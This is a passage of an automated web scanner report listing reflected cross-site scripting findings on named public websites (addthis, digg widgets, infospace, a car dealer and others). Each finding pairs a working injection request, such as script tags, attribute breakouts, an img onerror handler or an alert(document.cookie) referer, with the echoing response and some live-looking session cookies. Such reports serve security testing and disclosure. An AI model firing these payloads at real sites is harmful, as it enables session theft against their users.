GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrapa56ed<script>alert(1)</script>7b64c0d8f47&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39&mboxXDomainCheck=true HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1303044923199-20205; mboxPC=1303044923199-20205.17

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1303044923199-20205.17; Domain=webroot.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:58:00 GMT; Path=/m2/webroot
Content-Type: text/javascript
Content-Length: 229
Date: Sun, 17 Apr 2011 12:57:59 GMT
Server: Test & Target

mboxFactories.get('default').get('US-land-ss-promo-freescan-pagewrapa56ed<script>alert(1)</script>7b64c0d8f47',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303044923199-20205.17");

4.70. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 44d8b<script>alert(1)</script>66a3b0ec8df was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrap44d8b<script>alert(1)</script>66a3b0ec8df&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1303044923199-20205.17; Domain=webroot.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:58:28 GMT; Path=/m2/webroot
Content-Type: text/javascript
Content-Length: 229
Date: Sun, 17 Apr 2011 12:58:28 GMT
Server: Test & Target

mboxFactories.get('default').get('US-land-ss-promo-freescan-pagewrap44d8b<script>alert(1)</script>66a3b0ec8df',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303044923199-20205.17");

4.71. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 26212<script>alert(1)</script>78fde6bcdfc was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/Users/crawler/Documents/xss-dork-lawyers-cross-site-scripting-poc-example-report.html26212<script>alert(1)</script>78fde6bcdfc HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm.BNlU3ABZHXPpB8PFLJNsjdDI.BZHXPpHWhprofile=1302162943; d=fefe6614082a299e480fa82a030f6b9ca66e5879ab6cfb62ab4c68eb320e6b6d; s_vi=[CS]v1|26CEB6F6850116A7-40000108E0006B5B[CE]; s_nr=1302162936988; traffic_control=-781655937076166248%3A200; s_vnum=1304754922563%26vn%3D2

Response

HTTP/1.1 200 OK
Age: 0
Date: Sat, 16 Apr 2011 15:38:08 GMT
Via: NS-CACHE: 100
Etag: "9858d7c55d55811a51331e91c7debbf68dbde3df"
Content-Length: 181
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sat, 16 Apr 2011 15:48:07 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/Users/crawler/Documents/xss-dork-lawyers-cross-site-scripting-poc-example-report.html26212<script>alert(1)</script>78fde6bcdfc", "diggs": 0});

4.72. http://wsdsapi.infospace.com/infomaster/widgets [qkwid1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the qkwid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 405e1'%3balert(1)//58d1fc3843d was submitted in the qkwid1 parameter. This input was echoed as 405e1';alert(1)//58d1fc3843d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw405e1'%3balert(1)//58d1fc3843d&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/?9857d%22-alert(document.cookie)-%221634c822576=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 17 Apr 2011 14:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=cynPrBfSr6wOq0-qFaDs_K4AWxqbjFJYfMS4ue0Nu3EP7nbZjaWwwZQN4J4zs6cmIsld-_j2aIhk2g_1P2mafnr5hwE3zhwrC5fvIRJD0aAv6AUF6DKooFdV1RipdQgWbTW1aHTXUBHzJ0PZclM3hHqED5tp5xHkXgVnw3krlBW8btsG0; expires=Tue, 12-Mar-2013 01:08:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=v2zs5o455vktcdj4vlohjj3d; path=/
Set-Cookie: DomainSession=TransactionId=ea2c97e5d3dd40deb9005d11cdfccb01&SessionId=81862bbe4e154ba7974b5d11cdfccb01&ActionId=22cdec59af59446cbb715d11cdfccb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Sun, 17-Apr-2011 14:48:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=979777e4d1ef4fecb1535d11cdfccb01&LastSeenDateTime=4/17/2011 2:28:05 PM&IssueDateTime=4/17/2011 2:28:05 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Tue, 24-Mar-2111 14:28:05 GMT; path=/
Cache-Control: public
Expires: Sun, 17 Apr 2011 15:28:05 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent
Content-Length: 11855


                                   // variable contructors
var txtElements = [{txt:'qkw405e1';alert(1)//58d1fc3843d',btn:'sqkw'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw405e1';alert(1)//58d1fc3843d');input1.setAttribute('autocomplete','off');

function JSONscr
...[SNIP]...

4.73. http://wsdsapi.infospace.com/infomaster/widgets [submitid1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the submitid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1889f'%3balert(1)//4c7b192af5d was submitted in the submitid1 parameter. This input was echoed as 1889f';alert(1)//4c7b192af5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw1889f'%3balert(1)//4c7b192af5d HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/?9857d%22-alert(document.cookie)-%221634c822576=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 17 Apr 2011 14:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=TblQjB3Kf3UeeA8Ddb6tIlxgfpinUzJcOoyXqCmtv1TGOwEwyN_iY0q2oOZmFvHwVcLj_9vunW8iA59R2Sa7AYvXBTDPrp6g4DYLuKzWKhalNt7QbNTj7ebK8lT6iy-4FgDmbSisXR4oP_ROlYIU_2ldcw0PSnA1nGJNabFUsw0smt020; expires=Tue, 12-Mar-2013 01:08:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=i3yvohbjrhxfuv2idjlidwe1; path=/
Set-Cookie: DomainSession=TransactionId=3755bccb16cf4086b6a55d11cdfccb01&SessionId=6aec8e48eda34c8a81885d11cdfccb01&ActionId=17685e97d218424cbffc5d11cdfccb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Sun, 17-Apr-2011 14:48:06 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=22769300428a417aa0da5d11cdfccb01&LastSeenDateTime=4/17/2011 2:28:06 PM&IssueDateTime=4/17/2011 2:28:06 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Tue, 24-Mar-2111 14:28:06 GMT; path=/
Cache-Control: public
Expires: Sun, 17 Apr 2011 15:28:06 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent
Content-Length: 11831


                                   // variable contructors
var txtElements = [{txt:'qkw',btn:'sqkw1889f';alert(1)//4c7b192af5d'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw');input1.setAttribute('autocomplete','off');

function JSONscriptRequest(fullUrl, query) {
// RE
...[SNIP]...

4.74. http://www.100zakladok.ru/save/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.100zakladok.ru
Path:   /save/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60141"><script>alert(1)</script>9b64324f456 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /save/?60141"><script>alert(1)</script>9b64324f456=1 HTTP/1.1
Host: www.100zakladok.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:38 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=windows-1251
Content-Length: 8732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>100zakladok.ru - .......... ...... ... ........ ..... ........-........</tit
...[SNIP]...
<a href="/save/?60141"><script>alert(1)</script>9b64324f456=1">
...[SNIP]...

4.75. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 91a11<script>alert(1)</script>451b4735667 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php91a11<script>alert(1)</script>451b4735667 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:20:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=1hv6ufnjamb9mds53gfocv6570; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php91a11<script>alert(1)</script>451b4735667</strong>
...[SNIP]...

4.76. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21282"-alert(1)-"db41275acf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php21282"-alert(1)-"db41275acf8 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:20:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=mhkqrnaugp5kh6nhs0b28hgum2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php21282"-alert(1)-"db41275acf8";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

4.77. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1af27"-alert(1)-"3d4039de95d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php/1af27"-alert(1)-"3d4039de95d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93891

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/1af27"-alert(1)-"3d4039de95d";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

4.78. http://www.aerosocial.com/user_share.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aerosocial.com
Path:   /user_share.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8bd0"><img%20src%3da%20onerror%3dalert(1)>464ed54e568 was submitted in the REST URL parameter 1. This input was echoed as a8bd0"><img src=a onerror=alert(1)>464ed54e568 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user_share.phpa8bd0"><img%20src%3da%20onerror%3dalert(1)>464ed54e568 HTTP/1.1
Host: www.aerosocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:13 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: PHPSESSID=280e607399294214bca721ea793af478; path=/
Set-Cookie: se_language_autodetected=1; path=/
Content-Language: en
Content-Type: text/html
Content-Length: 21847


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<title>aero - the
...[SNIP]...
<select class='small' name='user_language_id' onchange="window.location.href='/profile.php?user=user_share.phpa8bd0"><img src=a onerror=alert(1)>464ed54e568&lang_id='+this.options[this.selectedIndex].value;">
...[SNIP]...

4.79. http://www.alltagz.de/bookmarks/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.alltagz.de
Path:   /bookmarks/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fba2"><script>alert(1)</script>0eb25d2f987 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmarks5fba2"><script>alert(1)</script>0eb25d2f987/ HTTP/1.1
Host: www.alltagz.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:20:52 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.5.1 mod_fastcgi/2.4.2 PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny10
Set-Cookie: PHPSESSID=f31196949f4a929d05a4fc5fde49f9a0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>alltagz: Favoriten online
...[SNIP]...
<a href="/bookmarks5fba2"><script>alert(1)</script>0eb25d2f987">
...[SNIP]...

4.80. http://www.allvoices.com/post_event [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /post_event

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a48"><script>alert(1)</script>d40146f6281 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post_eventd2a48"><script>alert(1)</script>d40146f6281 HTTP/1.1
Host: www.allvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:20:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-QueryCount: 2
X-Runtime: 393ms
Pragma: no-cache
X-QueryRuntime: 0.00659
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Set-Cookie: _T_=byyxux8ut5qtqk1zlo97ex6rd; path=/; expires=Mon, 18 Apr 2011 02:20:53 GMT
Set-Cookie: page_url=http%3A%2F%2Fwww.allvoices.com%2Fpost_eventd2a48%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed40146f6281; path=/
Set-Cookie: masala_session_id=ca361ecf3d65fa664236be822f977a79; path=/
Content-Length: 27741
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<meta property="og:url" content="http://www.allvoices.com/post_eventd2a48"><script>alert(1)</script>d40146f6281"/>
...[SNIP]...

4.81. http://www.automasterlandrover.com/smartbrowse/ajax/new.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 6a13d</noscript><script>alert(1)</script>7af8498f72f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse6a13d</noscript><script>alert(1)</script>7af8498f72f/ajax/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.automasterlandrover.com
Proxy-Connection: keep-alive
Referer: http://www.automasterlandrover.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63d606fa404638d9008b915da9d34eb2; JSESSIONID=1o9ay8sxhs37r; ddcpoolid=CmsPoolN; __utmz=1.1303052219.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=1.1930152101.1303052219.1303052219.1303052219.1; __utmc=1; __utmb=1.2.10.1303052219

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14379
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:57:09 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
</script>c5f2daa69&amp;20=www.automasterlandrover.com&amp;21=/smartbrowse6a13d</noscript><script>alert(1)</script>7af8498f72f/ajax/new.htm&amp;50=63d606fa404638d9008b915da9d34eb2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-
...[SNIP]...

4.82. http://www.automasterlandrover.com/smartbrowse/ajax/new.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload ff7f2</noscript><script>alert(1)</script>16ce2972f0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajaxff7f2</noscript><script>alert(1)</script>16ce2972f0d/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.automasterlandrover.com
Proxy-Connection: keep-alive
Referer: http://www.automasterlandrover.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63d606fa404638d9008b915da9d34eb2; JSESSIONID=1o9ay8sxhs37r; ddcpoolid=CmsPoolN; __utmz=1.1303052219.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=1.1930152101.1303052219.1303052219.1303052219.1; __utmc=1; __utmb=1.2.10.1303052219

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14379
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:57:09 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
</script>c5f2daa69&amp;20=www.automasterlandrover.com&amp;21=/smartbrowse/ajaxff7f2</noscript><script>alert(1)</script>16ce2972f0d/new.htm&amp;50=63d606fa404638d9008b915da9d34eb2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&
...[SNIP]...

4.83. http://www.bibsonomy.org/BibtexHandler [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bibsonomy.org
Path:   /BibtexHandler

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7912f"><script>alert(1)</script>ffb7212d2e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BibtexHandler7912f"><script>alert(1)</script>ffb7212d2e4 HTTP/1.1
Host: www.bibsonomy.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:21:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 www.bibsonomy.org, 1.1 www.bibsonomy.org
X-Pingback: http://scraper.bibsonomy.org/xmlrpc
Vary: Accept-Encoding
Connection: close
Content-Length: 8080

